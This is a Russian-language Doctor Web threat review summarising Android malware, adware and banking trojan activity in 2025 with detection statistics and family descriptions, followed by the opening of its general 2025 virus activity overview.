Одной из задач Android.Backdoor.Baohuo.1.origin является кража конфиденциальных данных. Например, вредоносная программа похищает логин и пароль от учетной записи Telegram жертвы, историю переписки в мессенджере, входящие СМС, контакты из телефонной книги устройства, а также способна перехватывать содержимое буфера обмена. Однако злоумышленники используют ее не только в качестве шпионского приложения. С помощью Android.Backdoor.Baohuo.1.origin они фактически могут управлять взломанной учетной записью и контролировать работу Telegram X, изменяя его функциональность. Так, бэкдор позволяет незаметно добавлять пользователя и удалять его из Telegram-каналов, вступать от его лица в чаты и скрывать устройства, авторизованные для его учетной записи. Для выполнения действий, которые требуют вмешательства в логику работы приложения, используется фреймворк Xposed. Киберпреступники управляют бэкдором как традиционным способом — через C2-сервер, так и путем отправки команд через базу данных Redis, что ранее не встречалось в других вредоносных программах для ОС Android. Общее число устройств, зараженных Android.Backdoor.Baohuo.1.origin, превысило 58 000. При этом были затронуты около 3 000 различных моделей смартфонов, планшетов, ТВ-приставок и даже автомобилей с бортовыми компьютерами на базе Android.

Страны с наибольшим числом устройств, зараженных Android.Backdoor.Baohuo.1.origin

Статистика

По данным статистики детектирований Dr.Web Security Space для мобильных устройств, в 2025 году самыми распространенными Android-угрозами стали различные вредоносные программы — пользователи сталкивались с ними в 81,11% случаев. Следом с долей 10,73% расположились потенциально опасные приложения. Третье место заняли рекламные программы, которые обнаруживались в 5,89% случаев. Наименьшая активность наблюдалась со стороны нежелательного ПО: на него пришлось 2,27% детектирований.

По сравнению с годом ранее, доля вредоносных и потенциально опасных программ возросла, в то время как доля нежелательного и рекламного ПО снизилась.

Вредоносные приложения

На протяжении нескольких лет рекламные трояны семейства Android.HiddenAds остаются лидерами по числу детектирований вредоносного ПО. В 2025 году ситуация не изменилась, однако за прошедшие 12 месяцев их доля несколько сократилась — с 31,95% до 27,42%.

Эти трояны показывают навязчивую рекламу в виде полноэкранных баннеров и видеороликов. Чтобы пользователям было сложнее обнаружить и удалить вредоносные программы с зараженных устройств, после установки они пытаются «спрятаться», например, скрывая или подменяя свои значки в меню главного экрана.

Самым активным представителем семейства оказался Android.HiddenAds.657.origin — на него пришлось более трети детектирований. Троян попал в поле зрения наших вирусных аналитиков еще в 2024 году и за это время выбился в лидеры. Он является одним из множества вариантов Android.HiddenAds.1994 — вредоносной программы, известной с 2021 года. Распространение получили и несколько ее новых версий — например, Android.HiddenAds.666.origin и Android.HiddenAds.673.origin. Нельзя исключать, что со временем они также могут подняться на верхние строчки, как это ранее случалось с другими модификациями Android.HiddenAds.1994.

В течение года пользователи вновь сталкивались с подсемейством Android.HiddenAds, Aegis, однако доля таких вредоносных программ от общего числа детектирований семейства заметно сократилась — с 17,37% до 3,11%. Эти трояны отличаются, в том числе, способностью запускаться автоматически после установки. Среди них самыми активными стали варианты Android.HiddenAds.Aegis.1 и Android.HiddenAds.Aegis.8.origin.

Вторым по распространенности вредоносным ПО оказались рекламные трояны Android.MobiDash, доля которых по сравнению с 2024 годом увеличилась с 5,38% до 15,64%. Среди них лидировал Android.MobiDash.7859. За ними расположились программы-подделки Android.FakeApp, которые используются в мошеннических целях и вместо обещанной функциональности загружают различные сайты. На них пришлось 10,94% детектирований. Это ниже показателя 2024 года, когда их доля составляла 18,28%. Такое снижение произошло, в том числе, за счет меньшей активности трояна Android.FakeApp.1600, однако он все еще остается самым распространенным представителем семейства. Его главной задачей является загрузка сайтов онлайн-казино.

Доля троянских программ семейства Android.Spy, реализующих различную шпионскую функциональность, сократилась с 11,52% до 3,09%. В то же время повысилась активность банковских троянов. Их доля от общего числа детектирований вредоносных приложений составила 6,94% против показателя 6,29% годом ранее.

В 2025 году с 5,49% до 6,01% увеличилось число детектирований программных упаковщиков, которые могут использовать, в том числе, и злоумышленники с целью защиты ВПО от обнаружения и анализа. Чаще всего на защищаемых устройствах выявлялись вредоносные программы с упаковщиком Android.Packed.57146.

Распространение получили различные вредоносные моды мессенджера WhatsApp. Среди них были модификации (Dr.Web детектирует их как Android.Click.1812), загружающие веб-сайты незаметно для жертв. Также наблюдалась возросшая активность многофункциональных троянов семейства Android.Triada, которые злоумышленники могут внедрять в прошивку Android-устройств. Их доля возросла с 2,74% до 7,48%.

Десять наиболее часто детектируемых вредоносных Android-приложений в 2025 году:

Android.HiddenAds.657.origin
Android.HiddenAds.4214
Android.HiddenAds.655.origin
Android.HiddenAds.4213
Android.HiddenAds.666.origin: Троянские программы для показа навязчивой рекламы. Представители этого семейства часто распространяются под видом безобидных приложений и в некоторых случаях устанавливаются в системный каталог другим вредоносным ПО. Попадая на Android-устройства, такие рекламные трояны обычно скрывают от пользователя свое присутствие в системе — например, «прячут» значок приложения из меню главного экрана.
Android.MobiDash.7859: Троянская программа, показывающая надоедливую рекламу. Она представляет собой программный модуль, который разработчики ПО встраивают в приложения.
Android.FakeApp.1600: Троянская программа, которая загружает указанный в ее настройках веб-сайт. Известные модификации этого вредоносного приложения загружают сайт онлайн-казино.
Android.Click.1812: Детектирование вредоносных модов мессенджера WhatsApp, которые незаметно для пользователя могут загружать различные сайты в фоновом режиме.
Android.Packed.57146: Детектирование вредоносных приложений, которые упакованы с помощью популярного коммерческого обфускатора кода.
Android.Triada.5847: Детектирование упаковщика для троянов семейства Android.Triada, предназначенного для их защиты от анализа и обнаружения. Чаще всего злоумышленники используют его совместно с вредоносными модами мессенджера Telegram, в которые непосредственно встроены эти трояны.

Нежелательное ПО

Наиболее распространенным нежелательным ПО в 2025 году вновь стали приложения Program.FakeMoney.11, на которые пришлось 51,96% детектирований. Они предлагают пользователям за вознаграждение выполнять те или иные задания и якобы в дальнейшем позволяют конвертировать награду в настоящие деньги. На самом деле никаких выплат в итоге не происходит. Вместе с Program.FakeMoney.11 распространение получили и другие аналогичные программы, например — Program.FakeMoney.14 и Program.FakeMoney.16, однако с ними пользователи сталкивались значительно реже.

На втором месте с показателем 10,37% расположились программы Program.FakeAntiVirus.1, которые имитируют работу антивирусов и обнаруживают несуществующие угрозы. Для «лечения» заражения они предлагают приобрести полную версию ПО.

Приложения Program.CloudInject.1, которые модифицируются в облачном сервисе CloudInject, с долей 6,41% стали третьими по распространенности. Их варианты, детектируемые как Program.CloudInject.5, с показателем 5,08% оказались рядом с ними на четвертой позиции. Изменения в такие программы вносятся непосредственно на удаленном сервере, а доступ к сервису предоставляет утилита Tool.CloudInject, которая является лишь оболочкой для работы с ним. При модификации к программам добавляются опасные системные разрешения и обфусцированный код. Кроме того, через сервис CloudInject моддеры способны дистанционно управлять модифицированными приложениями, например, заблокировать их и потребовать ввести код для дальнейшего использования.

В 2025 году наблюдался незначительный рост числа детектирований ряда программ, которые могут применяться для наблюдения за пользователями и контроля их активности. В руках злоумышленников такие инструменты превращаются в шпионское ПО. Так, доля приложения Program.TrackView.1.origin и его варианта Program.TrackView.2.origin увеличилась с 2,40% до 2,91% и с 0,21% до 0,97% соответственно. Доля Program.SecretVideoRecorder.1.origin возросла c 2,03% до 2,56%, а его модификации Program.SecretVideoRecorder.2.origin — с 0,90% до 1,02%. Показатель программы Program.SnoopPhone.1.origin увеличился с 0,31% до 1,01%.

Десять наиболее часто детектируемых нежелательных приложений в 2025 году:

Program.FakeMoney.11
Program.FakeMoney.14: Детектирование приложений, якобы позволяющих зарабатывать на выполнении тех или иных действий или заданий. Эти программы имитируют начисление вознаграждений, причем для вывода «заработанных» денег требуется накопить определенную сумму. Обычно в них имеется список популярных платежных систем и банков, через которые якобы возможно перевести награды. Но даже когда пользователям удается накопить достаточную для вывода сумму, обещанные выплаты им не поступают. Этой записью также детектируется другое нежелательное ПО, основанное на коде таких программ.
Program.FakeAntiVirus.1: Детектирование рекламных программ, которые имитируют работу антивирусного ПО. Такие программы могут сообщать о несуществующих угрозах и вводить пользователей в заблуждение, требуя оплатить покупку полной версии.
Program.CloudInject.1
Program.CloudInject.5: Детектирование Android-приложений, модифицированных при помощи облачного сервиса CloudInject и одноименной Android-утилиты (добавлена в вирусную базу Dr.Web как Tool.CloudInject). Такие программы модифицируются на удаленном сервере, при этом заинтересованный в их изменении пользователь (моддер) не контролирует, что именно будет в них встроено. Кроме того, приложения получают набор опасных разрешений. После модификации программ у моддера появляется возможность дистанционно управлять ими — блокировать, показывать настраиваемые диалоги, отслеживать факт установки и удаления другого ПО и т. д.
Program.TrackView.1.origin
Program.TrackView.2.origin: Детектирование приложения, позволяющего вести наблюдение за пользователями через Android-устройства. С помощью этой программы злоумышленники могут определять местоположение целевых устройств, использовать камеру для записи видео и создания фотографий, выполнять прослушивание через микрофон, создавать аудиозаписи и т. д.
Program.SecretVideoRecorder.1.origin
Program.SecretVideoRecorder.2.origin: Детектирование различных версий приложения для фоновой фото- и видеосъемки через встроенные камеры Android-устройств. Эта программа может работать незаметно, позволяя отключить уведомления о записи, а также изменять значок и описание приложения на фальшивые. Такая функциональность делает ее потенциально опасной.
Program.SnoopPhone.1.origin: Программа для наблюдения за владельцами Android-устройств. Она позволяет читать СМС, получать информацию о телефонных вызовах, отслеживать местоположение и выполнять аудиозапись окружения.

Потенциально опасные программы

В 2025 году самым распространенным потенциально опасным ПО стали программы, модифицированные при помощи инструмента NP Manager. Это утилита для модификации приложений, которая содержит различные модули для обфускации и защиты кода программ, а также обхода проверки их цифровой подписи после модификации. Злоумышленники часто применяют ее для защиты вредоносных приложений, чтобы затруднить их детектирование антивирусами. Доля таких программ по сравнению с 2024 годом возросла с 24,52% до 53,59%, и на них пришлось уже более половины детектирований потенциально опасного ПО. Чаще всего на защищаемых устройствах встречались варианты Tool.NPMod.3 (32,85%), Tool.NPMod.1 (12,61%), Tool.NPMod.1.origin (3,02%) и Tool.NPMod.4 (2,31%).

С 3,93% до 8,11% возросло количество детектирований Tool.Androlua — ряда фреймворков, созданных для разработки Android-приложений на языке программирования Lua. Они требуют множество системных разрешений, включая использование службы специальных возможностей Android. Созданные с их помощью программы построены на Lua-скриптах, которые зашифрованы и расшифровываются только непосредственно перед исполнением. Такие скрипты потенциально могут быть вредоносными. С 8,16% до 10,06% увеличилась доля приложений, модифицированных при помощи утилиты Tool.LuckyPatcher. Этот инструмент модифицирует установленные программы, загружая из интернета специально подготовленные скрипты.

В то же время доля утилит Tool.SilentInstaller, которые позволяют запускать Android-приложения без их установки, снизилась с 33,10% до 10,55%. Самыми распространенными вариантами семейства в 2025 году стали Tool.SilentInstaller.14.origin (4,66%), Tool.SilentInstaller.6.origin (2,07%) и Tool.SilentInstaller.7.origin (1,88%). Кроме того, с 13,17% до 2,58% уменьшилась доля программ, защищенных упаковщиком Tool.Packer.1.origin.

Десять наиболее распространенных потенциально опасных приложений, обнаруженных на Android-устройствах в 2025 году:

Tool.NPMod.3
Tool.NPMod.1
Tool.NPMod.1.origin
Tool.NPMod.4: Детектирование Android-приложений, модифицированных при помощи утилиты NP Manager. Эта утилита содержит модули для обфускации и защиты кода программ, а также обхода проверки их цифровой подписи после модификации. Добавляемая ей обфускация часто используется во вредоносном ПО для затруднения его детектирования и анализа.
Tool.Androlua.1.origin: Детектирование ряда потенциально опасных версий специализированного фреймворка для разработки Android-программ на скриптовом языке программирования Lua. Основная логика Lua-приложений расположена в соответствующих скриптах, которые зашифрованы и расшифровываются интерпретатором перед выполнением. Часто данный фреймворк по умолчанию запрашивает доступ ко множеству системных разрешений для работы, в том числе для использования сервиса специальных возможностей ОС Android. В результате исполняемые через него Lua-скрипты способны выполнять различные вредоносные действия в соответствии с полученными разрешениями.
Tool.LuckyPatcher.2.origin
Tool.LuckyPatcher.1.origin: Утилита, позволяющая модифицировать установленные Android-приложения (создавать для них патчи) с целью изменения логики их работы или обхода тех или иных ограничений. Например, с ее помощью пользователи могут попытаться отключить проверку root-доступа в банковских программах или получить неограниченные ресурсы в играх. Для создания патчей утилита загружает из интернета специально подготовленные скрипты, которые могут создавать и добавлять в общую базу все желающие. Функциональность таких скриптов может оказаться в том числе и вредоносной, поэтому создаваемые патчи могут представлять потенциальную опасность.
Tool.SilentInstaller.14.origin: Потенциально опасная программная платформа, которая позволяет приложениям запускать APK-файлы без их установки. Она создает виртуальную среду исполнения, которая не затрагивает основную операционную систему.
Tool.Packer.1.origin: Специализированная утилита-упаковщик для защиты Android-приложений от модификации и обратного инжиниринга. Она не является вредоносной, но может использоваться для защиты как безобидных, так и троянских программ.

Рекламные приложения

Среди рекламного ПО наибольшее распространение в 2025 году получили сторонние модификации приложения WhatsApp, детектируемые как Adware.ModAd.1. В такие модификации внедрена функциональность по открытию ссылок при работе с мессенджером. С этих ссылок выполняется перенаправление на рекламируемые сайты. По сравнению с 2024 годом доля Adware.ModAd.1 от общего числа рекламных приложений, обнаруженных на защищаемых устройствах, снизилась с 47,45% до 26,90%.

Встраиваемые в Android-программы модули Adware.Adpush, которые демонстрируют рекламные уведомления, расположились на втором месте, за год увеличив активность с 14,76% до 26,19%. Третье место с показателем 8,88% заняли представители семейства Adware.Basement, доля которых по сравнению с годом ранее осталась практически неизменной. Такие программы могут показывать рекламу, которая ведет на вредоносные сайты.

Распространение также получили семейства рекламных приложений Adware.Airpush (число детектирований возросло с 4,35% до 5,14%), Adware.Fictus (рост с 3,29% до 6,21%), Adware.Youmi (рост с 1,62% до 2,91%) а также Adware.Leadbolt (рост с 2,26% до 2,41%) и Adware.Jiubang (рост с 1,70% до 2,38%).

Десять наиболее распространенных рекламных приложений, обнаруженных на Android-устройствах в 2025 году:

Adware.ModAd.1: Детектирование некоторых модифицированных версий (модов) мессенджера WhatsApp, в функции которых внедрен код для загрузки заданных ссылок через веб-отображение во время работы с мессенджером. С этих интернет-адресов выполняется перенаправление на рекламируемые сайты — например, онлайн-казино и букмекеров, сайты для взрослых.
Adware.AdPush.3.origin
Adware.Adpush.21846
Adware.AdPush.39.origin: Рекламные модули, которые могут быть интегрированы в Android-программы. Они демонстрируют рекламные уведомления, вводящие пользователей в заблуждение. Например, такие уведомления могут напоминать сообщения от операционной системы. Кроме того, эти модули собирают ряд конфиденциальных данных, а также способны загружать другие приложения и инициировать их установку.
Adware.Basement.1: Приложения, демонстрирующие нежелательную рекламу, которая часто ведет на вредоносные и мошеннические сайты. Они имеют общую кодовую базу с нежелательными программами Program.FakeMoney.11.
Adware.Fictus.1.origin: Рекламный модуль, который злоумышленники встраивают в версии-клоны популярных Android-игр и программ. Его интеграция в программы происходит при помощи специализированного упаковщика net2share. Созданные таким образом копии ПО распространяются через различные каталоги приложений и после установки демонстрируют нежелательную рекламу.
Adware.Airpush.7.origin: Программные модули, встраиваемые в Android-приложения и демонстрирующие разнообразную рекламу. В зависимости от версии и модификации это могут быть рекламные уведомления, всплывающие окна или баннеры. С помощью данных модулей злоумышленники часто распространяют вредоносные программы, предлагая установить то или иное ПО. Кроме того, такие модули передают на удаленный сервер различную конфиденциальную информацию.
Adware.Youmi.4: Детектирование нежелательного рекламного модуля, который размещает рекламные ярлыки на главном экране Android-устройств.
Adware.Jiubang.1: Нежелательное рекламное ПО для Android-устройств, которое при установке приложений демонстрирует баннер с рекомендуемыми к установке программами.
Adware.Inmobi.1: Детектирование некоторых версий рекламного SDK Inmobi, способных совершать телефонные звонки и добавлять события в календарь Android-устройств.

Угрозы в Google Play

В 2025 году антивирусная лаборатория компании «Доктор Веб» обнаружила в каталоге Google Play более 180 вредоносных, нежелательных и рекламных программ, которые суммарно были установлены по меньшей мере 2 165 040 раз. Среди них были различные модификации троянов Android.HiddenAds.4213 и Android.HiddenAds.4215, которые скрывали присутствие на зараженных устройствах и демонстрировали рекламу поверх интерфейса операционной системы и других приложений. Эти трояны распространялись под видом фоторедакторов, программ для фото- и видеосъемки и другого ПО.

Программы Time Shift Cam и Fusion Collage Editor были рекламными троянами Android.HiddenAds

Под видом официального ПО криптобиржи Dydx и блокчейн-платформ Raydium и Aerodrome Finance киберпреступники распространяли трояны Android.CoinSteal.202, Android.CoinSteal.203 и Android.CoinSteal.206, похищавших криптовалюту.

В программах Raydium и Dydx Exchange скрывалось троянское ПО для кражи криптовалюты

Эти вредоносные приложения предлагали пользователям ввести мнемоническую фразу якобы для подключения криптокошелька, однако на самом деле вводимые данные отправлялись злоумышленникам. Чтобы еще больше ввести потенциальных жертв в заблуждение, формы для ввода мнемонических фраз могли быть замаскированы под запросы от других криптоплатформ.

Android.CoinSteal.206 демонстрирует фишинговую форму якобы от имени криптобиржи PancakeSwap и запрашивает мнемоническую фразу для доступа к криптокошельку

В течение года наши специалисты выявили в Google Play более 80 вредоносных приложений семейства Android.Joker, подписывающих пользователей на платные услуги. Они распространялись под видом различного ПО, включая мессенджеры, программы для фотосъемки, системные утилиты, редакторы изображений и программы для работы с документами.

Примеры выявленных троянов Android.Joker: Android.Joker.2494 распространялся в виде мессенджера File Text Messages, а Android.Joker.2496 — под видом утилиты Useful Cleaner для оптимизации работы смартфона

Киберпреступники вновь распространяли всевозможные программы-подделки Android.FakeApp, которые применяются в различных мошеннических схемах. Их основной задачей является загрузка целевых веб-страниц. Часть этих троянов злоумышленники выдавали за ПО финансовой тематики. Такие программы загружали мошеннические сайты, якобы связанные с инвестициями и онлайн-заработком, а также фишинговые сайты. Другие программы-подделки Android.FakeApp распространялись под видом игр и при определенных условиях могли загружать сайты онлайн-казино и букмекеров. В общей сложности мы зафиксировали более 100 таких программ в Google Play.

Примеры приложений-подделок Android.FakeApp. Троян Android.FakeApp.1863, который скрывался в программе TPAO, был ориентирован на турецких пользователей и предлагал им управлять депозитами и доходами. А троян Android.FakeApp.1840 распространялся в виде игры Pino Bounce и мог загружать сайт онлайн-казино

Вирусные аналитики «Доктор Веб» также обнаружили новое нежелательное рекламное ПО Adware.Adpush.21912, которое скрывалось в программе Coin News Promax с информацией о криптовалютах. Adware.Adpush.21912 демонстрирует уведомления, при нажатии на которые в WebView загружается заданная C2-сервером ссылка.

Приложение Coin News Promax из Google Play являлось рекламным ПО Adware.Adpush.21912

Кроме того, наши специалисты выявили нежелательную программу Program.FakeMoney.16, которая распространялась в виде приложения Zeus Jackpot Mania. Пользователи в игровой форме получали в нем виртуальные награды, которые затем якобы могли конвертировать в настоящие деньги и вывести из приложения.

Программа Zeus Jackpot Mania представляла собой нежелательное приложение Program.FakeMoney.16

Для «вывода» денег программа запрашивала ряд данных, однако никаких выплат пользователи не получали.

Program.FakeMoney.16 просит указать полное имя пользователя и сведения об учетной записи банка

Банковские трояны

По данным статистики детектирований Dr.Web Security Space для мобильных устройств в 2025 году доля банковских троянов от общего числа зафиксированных вредоносных программ составила 6,94%, что чуть выше значения 6,29% годом ранее. В течение первых трех месяцев активность банковских троянов оставалась примерно на одном уровне, однако уже в начале II квартала заметно возросла. Далее она начала постепенно снижаться, достигнув годового минимума в июле. С августа число детектирований вновь стало расти и уже в октябре достигло пика. В конце года наблюдалось очередное снижение.

В 2025 году злоумышленники по-прежнему использовали ряд популярных семейств банковских троянов в проводимых атаках. Среди наиболее активных были вредоносные программы Android.Banker.Mamont, Coper, Android.BankBot.Ermac и ряд других. Кроме того, были выявлены новые версии троянов NGate, которые используют технологию NFC для кражи денег. Эти вредоносные программы передают злоумышленникам данные с NFC-чипа зараженных устройств, позволяя мошенникам без дальнейшего вовлечения пользователей снимать деньги со счетов жертв в банкоматах или совершать покупки с использованием бесконтактной оплаты. Среди наиболее активных были такие модификации как Android.Banker.NGate.8, Android.Banker.NGate.17, Android.Banker.NGate.5.origin.

Продолжилось распространение Android.SpyMax — вредоносных приложений со шпионской функциональностью, основанных на ставшем общедоступным исходном коде RAT-трояна SpyNote. Киберпреступники используют их, в том числе, и в качестве банковских троянов. Вместе с тем активность Android.SpyMax по сравнению с 2024 годом снизилась. На долю этих вредоносных приложений пришлось 12,35% детектирований банковских троянов против показателя 32,04% годом ранее.

В 2025 году российские пользователи чаще всего сталкивались с различными банковскими троянами, которые по классификации компании «Доктор Веб» входят в обширное семейство Mamont (Android.Banker.790.origin, Android.Banker.Mamont.3.origin, Android.Banker.Mamont.28.origin). Оно включает разнообразные вредоносные приложения, которые вирусописатели продолжают активно модифицировать и развивать. Эти программы перехватывают СМС с одноразовыми кодами от кредитных организаций и похищают данные банковских карт и другую конфиденциальную информацию.

В течение года наши специалисты отмечали активность банковских троянов, нацеленных на жителей Узбекистана и сопредельных с ним государств, включая Армению, Азербайджан и Киргизию. Чаще всего на защищаемых устройствах детектировались Android.Banker.951.origin, Android.Banker.881.origin и Android.Banker.963.origin, крадущие проверочные СМС-коды от кредитных организаций. Киберпреступники постоянно модифицируют такие вредоносные приложения, чтобы усложнить их выявление. Турецких пользователей наиболее часто атаковали банковские трояны Android.BankBot.Coper.12.origin, Android.Banker.5685 и Android.Banker.864.origin, также способные похищать содержимое СМС-сообщений.

В то же время жители Ирана столкнулись с троянами Android.BankBot.1190.origin, Android.BankBot.1191.origin и их модификациями. Эти вредоносные программы крадут банковскую информацию из СМС-сообщений: находят в них данные о банковских картах, счетах жертвы, количестве доступных денег, выполненных транзакциях и т. д., после чего отправляют их злоумышленникам. Они также собирают информацию о контактах из телефонной книги и способны отправлять СМС по команде атакующих.

Жителей многих стран Юго-Восточной Азии и Азиатско-Тихоокеанского региона, в том числе Индонезии и Южной Кореи, атаковал троян Android.BankBot.Remo.1.origin. Эта вредоносная программа использует специальные возможности (Accessibility Services) для кражи данных из установленных на зараженных устройствах приложений банков и криптокошельков. Помимо трояна Remo, южнокорейские пользователи также сталкивались с троянами Android.BankBot.15140, Android.BankBot.Ermac.6.origin и GoldDigger (Android.BankBot.GoldDigger.9, Android.BankBot.GoldDigger.11).

Вредоносные программы GoldDigger применялись и против индонезийских и тайских пользователей. А банковский троян Android.BankBot.Gigabud.1.origin использовался против клиентов кредитных организаций Индонезии и Малайзии. В то же время злоумышленники продолжили применять троянов MoqHao при атаках на японскую аудиторию. Распространение получили такие модификации MoqHao как Android.Banker.672.origin, Android.Banker.5063, Android.Banker.740.origin и ряд других.

Одним из банковских троянов, нацеленных на жителей Индии, стал Android.Banker.6209. Троян имитирует внешний вид настоящих банковских приложений с целью кражи данных пользователей — их имен, номеров банковских карт и CVV-кодов безопасности. Кроме того, он использует зараженные устройства для скрытой добычи криптовалюты Monero. Распространение вновь получили банковские трояны RewardSteal, такие как Android.Banker.814.origin, Android.Banker.913.origin и Android.Banker.5132. Для кражи банковских данных они маскируются под ПО, якобы имеющее отношение к индийским кредитным организациям — например, ICICI, SBI, Axis и PM Kisan.

Бразильских владельцев Android-устройств чаще всего атаковали вредоносные программы Android.BankBot.1183.origin, а также ряд представителей семейства NGate — Android.Banker.NGate.8, Android.Banker.NGate.9 и Android.Banker.NGate.14.

В 2025 году вирусописатели продолжили использовать различные техники защиты банковских Android-троянов от анализа и детектирования. Например, распространение получили всевозможные методы обфускации и сокрытия кода, такие как DEX to C (конвертация исполняемого DEX-кода в код языка C), а также обфускация вредоносных приложений при помощи инструмента NP Manager.

Популярными остались техники манипуляции с форматом ZIP-архивов, которыми фактически являются APK-файлы Android-приложений. Среди них — манипуляция с полями compression method и compressed size в структуре заголовка локального файла внутри APK, а также использование некорректных данных о диске в записи ECDR и CD. Подробнее о них мы рассказывали в прошлом обзоре в разделе о банковских троянах. После таких манипуляций троянские программы остаются полностью работоспособными, но многие инструменты статического анализа воспринимают их как поврежденные и неспособны обработать корректно.

Вирусописатели стали активнее применять программы-дропперы для сокрытия основной полезной нагрузки, например, для обхода внутренней защиты каталога Google Play. Киберпреступники также используют ИИ-ассистентов при написании кода банковских троянов, что упрощает их разработку и ведет к появлению новых семейств. Кроме того, злоумышленники чаще используют Telegram-боты для управления банковскими троянами и эксфильтрации данных с зараженных устройств.

Перспективы и тенденции

В 2025 году мы наблюдали высокую активность рекламных троянов, которые остаются самыми распространенными угрозами для ОС Android. Широкое распространение вновь получили и различные программы-подделки, которые используются в мошеннических целях, в том числе — для фишинга и кражи денег. Кроме того, продолжился рост числа атак с использованием банковских троянов. Все эти вредоносные приложения являются источником нелегального дохода для киберпреступников, поэтому их популярность остается на высоком уровне. В следующем году они с высокой долей вероятности вновь станут одними из популярных инструментов заработка злоумышленников. При этом вирусописатели все чаще используют Telegram-боты для управления банковскими троянами. Эта тенденция, скорее всего, продолжится.

Появление вредоносной программы Android.Clipper.31, а также новых версий троянов Android.Vo1d и Android.Triada в прошивках смартфонов и TV-приставок говорит о сохраняющемся интересе злоумышленников в распространении вредоносного ПО способами, которые значительно усложняют его обнаружение. Весьма вероятно, что в новом году тенденция сохранится, и мы увидим новые случаи предустановки вредоносных приложений на смартфоны, ТВ-приставки и другие типы Android-устройств.

Следует также ожидать появления более сложных вредоносных программ, способных выполнять широкий спектр задач. Среди них могут быть очередные бэкдоры и различные трояны-шпионы. Кроме того, вирусописатели наверняка вновь будут использовать официальные каталоги программ, в том числе Google Play, для размещения в них вредоносного и нежелательного ПО.

Злоумышленники также продолжат внедрять различные способы защиты для создаваемых ими инструментов. Также они будут чаще использовать ИИ-помощников при написании кода, в результате чего стоит ожидать появления большего числа новых семейств.

Компания «Доктор Веб» следит за ландшафтом угроз в мобильном сегменте и оперативно реагирует на возникающие вызовы. Пользователям Android мы рекомендуем установить Dr.Web Security Space для мобильных устройств, чтобы защитить себя от вредоносных и других опасных программ.

Индикаторы компрометации

«Доктор Веб»: обзор вирусной активности за 2025 год

Thu, 15 Jan 2026 00:00:00 GMT

Скачать PDF

15 января 2026 года

В 2025 году одними из самых активных угроз стали трояны, предназначенные для показа рекламы. Пользователи также сталкивались с различными вредоносными скриптами и троянскими приложениями, которые запускают в инфицированной системе другое вредоносное ПО. В почтовом трафике чаще всего выявлялись троянские программы-загрузчики, бэкдоры, эксплойты, вредоносные скрипты и фишинговые документы.

Среди мобильных угроз наибольшее распространение получили рекламные трояны и программы-подделки, используемые в различных мошеннических схемах. Также отмечался рост активности банковских троянов. При этом вирусные аналитики «Доктор Веб» обнаружили десятки новых вредоносных, нежелательных и рекламных программ в каталоге Google Play.

По сравнению с 2024 годом сократилось количество обращений пользователей за расшифровкой файлов. В то же время в течение года наши интернет-аналитики фиксировали рост числа мошеннических сайтов, созданных для кражи учетных записей пользователей мессенджера Telegram. Кроме того, распространение вновь получили нежелательные сайты финансовой тематики.

В 2025 году антивирусная лаборатория «Доктор Веб» расследовала несколько таргетированных атак, одна из которых была совершена на российское машиностроительное предприятие. В ходе нее злоумышленники использовали ряд вредоносных приложений, с помощью которых пытались получить конфиденциальные данные с зараженных компьютеров. Наши специалисты установили, что к атаке была причастна хакерская группировка Scaly Wolf. Другой инцидент произошел с одним из российских государственных учреждений, которое подверглось нападению хакерской группы Cavalry Werewolf. Вирусные аналитики «Доктор Веб» выявили множество вредоносных инструментов злоумышленников, а также изучили особенности группировки и характерные для нее действия внутри скомпрометированных сетей.

В течение 2025 года компания «Доктор Веб» также сообщала о ряде других инцидентов информационной безопасности. В январе наша антивирусная лаборатория выявила активную кампанию по добыче криптовалюты Monero, организованную с использованием множества различных вредоносных программ. А в апреле мы проинформировали о трояне, найденном в прошивке ряда моделей Android-смартфонов. С его помощью киберпреступники похищали криптовалюту. Кроме того, в апреле наши специалисты выявили Android-трояна, которого злоумышленники внедрили в одну из версий популярной картографической программы и использовали для слежки за российскими военнослужащими.

В июле эксперты «Доктор Веб» рассказали о новом семействе троянов, созданных для кражи криптовалюты и паролей. Злоумышленники распространяли их под видом модов, читов и патчей для игр. В августе вирусные аналитики предупредили о распространении многофункционального бэкдора для мобильных устройств, который был нацелен на представителей российского бизнеса. Киберпреступники управляли им дистанционно, похищая с его помощью конфиденциальные данные и следя за жертвами.

В октябре мы рассказали о бэкдоре для Android-устройств, которого киберпреступники распространяют в составе модифицированных версий мессенджера Telegram X. Эта вредоносная программа похищает логины и пароли от учетных записей Telegram и другие конфиденциальные данные. С ее помощью вирусописатели могут управлять взломанными аккаунтами жертв и полностью контролировать сам мессенджер, выполняя различные действия от имени пользователей.

В декабре на нашем сайте вышел материал о трояне, который «накручивает» популярность сайтов и для этого притворяется человеком, чтобы его действия не заблокировала антибот-защита интернет-площадок. Вредоносная программа самостоятельно ищет нужные сайты в поисковых системах, открывает их и выполняет клики на веб-страницах в соответствии с получаемыми от злоумышленников параметрами.

В 2025 году также отмечался рост популярности атак ClickFix, при которых злоумышленники применяют социальную инженерию, чтобы пользователи самостоятельно запустили вредоносный код на своих устройствах.

Главные тенденции года

Отмечалась высокая активность рекламных троянов
Произошли новые таргетированные атаки
Наблюдался рост популярности атак с применением метода ClickFix
Снизилось число инцидентов с троянскими программами-шифровальщиками
Увеличилось количество детектирований банковских троянов для Android
Были выявлены новые случаи заражения прошивок Android-устройств
В каталоге Google Play вновь распространялись различные вредоносные и нежелательные программы

Наиболее интересные события 2025 года

В январе 2025 года специалисты «Доктор Веб» выявили кампанию по добыче криптовалюты Monero с использованием вредоносного майнера SilentCryptoMiner. Его файлы были замаскированы под различное ПО, например программы для совершения видеозвонков. При заражении компьютеров они удаляли другие майнеры, которые могли быть ранее установлены в систему. В рамках этой кампании для распространения некоторых вредоносных компонентов злоумышленники применяли стеганографию — прием, позволяющий скрыть одни данные среди других (например, в изображениях). После скачивания специальным образом сформированных изображений соответствующие компоненты SilentCryptoMiner извлекались из них и запускались.

В апреле наши вирусные аналитики проинформировали о трояне Android.Clipper.31, обнаруженном в прошивке ряда бюджетных моделей Android-смартфонов. Злоумышленники встроили его в модифицированную версию мессенджера WhatsApp, который затем предустановили на устройства, скомпрометировав цепочку поставок некоторых производителей. Android.Clipper.31 перехватывает отправляемые и принимаемые в мессенджере сообщения, ищет в них адреса криптокошельков Tron и Ethereum и заменяет их адресами, которые принадлежат киберпреступникам. При этом троян скрывает подмену, и жертвы видят в таких сообщениях корректные адреса криптокошельков.

